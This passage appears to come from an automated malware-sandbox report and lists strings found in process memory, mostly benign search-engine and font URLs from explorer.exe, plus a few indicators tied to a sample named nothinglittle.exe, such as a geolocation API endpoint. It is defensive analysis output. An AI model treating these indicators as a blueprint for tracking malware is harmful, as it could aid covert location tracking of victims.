Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: nothinglittle.exe	String found in binary or memory: http://us1.unwiredlabs.com/v2/process.php
Source: nothinglittle.exe.9.dr	String found in binary or memory: http://us1.unwiredlabs.com/v2/process.php?application/json;
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp1
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpg
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpT
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
